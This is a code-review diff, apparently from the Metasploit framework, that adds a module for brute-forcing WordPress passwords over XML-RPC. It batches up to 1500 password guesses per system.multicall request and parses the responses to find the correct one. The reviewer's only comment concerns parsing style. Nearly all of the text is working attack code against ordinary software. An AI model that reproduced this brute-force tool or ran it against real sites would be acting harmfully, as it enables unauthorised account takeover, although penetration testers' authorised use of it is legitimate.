modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb

```diff
@@ -0,0 +1,163 @@
+    xml_payloads = []                          # Container for all generated XMLs
+
+    # Evil XML | Limit number of log-ins to 1500/request for wordpress limitation
+    passwords.each_slice(1500) do |pass_group|
+
+      document = Nokogiri::XML::Builder.new do |xml|
+        xml.methodCall {
+          xml.methodName("system.multicall")
+          xml.params {
+          xml.param {
+          xml.value {
+          xml.array {
+          xml.data {
+
+        pass_group.each  do |pass|
+          xml.value {
+          xml.struct {
+          xml.member {
+          xml.name("methodName")
+          xml.value { xml.string("wp.getUsersBlogs") }}
+            xml.member {
+            xml.name("params")
+            xml.value {
+            xml.array {
+            xml.data {
+            xml.value {
+            xml.array {
+              xml.data {
+                xml.value { xml.string(user) }
+                xml.value { xml.string(pass) }
+          }}}}}}}}}
+        end
+
+          }}}}}}
+      end
+
+      xml_payloads << document.to_xml
+    end
+
+    vprint_status('Generating XMLs just done.')
+    xml_payloads
+  end
+
+  #
+  # Check target status
+  #
+  def check_wpstatus
+    print_status("Checking #{peer} status!")
+
+    if !wordpress_and_online?
+      print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress or you got blocked!")
+      return
+    elsif !wordpress_xmlrpc_enabled?
+      print_error("#{rhost}:#{rport}#{target_uri} does not enable XMLRPC")
+      return
+    else
+      print_status("Target #{peer} is running Wordpress")
+    end
+  end
+
+  def run
+    check_wpstatus
+
+    usernames.each do |user|
+      passfound = false
+
+      print_status("Bruteforcing user: #{user}")
+      generate_xml(user).each do |xml|
+        break if passfound == true
+
+        uri = target_uri.path
+        opts =
+            {
+              'method'  => 'POST',
+              'uri'     => normalize_uri(uri, wordpress_url_xmlrpc),
+              'data'    => xml,
+              'ctype'   =>'text/xml'
+            }
+
+        client = Rex::Proto::Http::Client.new(rhost)
+        client.connect
+        request  = client.request_cgi(opts)
+        response = client.send_recv(request)
+
+        # Request Parser
+        req_xml = Nokogiri::Slop xml
+        # Response Parser
+        res_xml = Nokogiri::Slop response.to_s.scan(/<.*>/).join
+
+        begin
+          res_xml.document.methodResponse.params.param.value.array.data.value.each_with_index do |value, i|
+            begin
+              # If this gives exception then its the correct password
+              value.struct.member[1].value.string.text
+            rescue
+              user = req_xml.document.methodCall.params.param.value.array.data.value[i].struct.member[1].value.array.data.value.array.data.value[0].text.strip
```

Comment:
This looks like a lot of effort. Would a #at or #search method from Nokogiri do better for you? See if this writeup helps to make this code cleaner: https://github.com/rapid7/metasploit-framework/wiki/How-to-parse-an-HTTP-response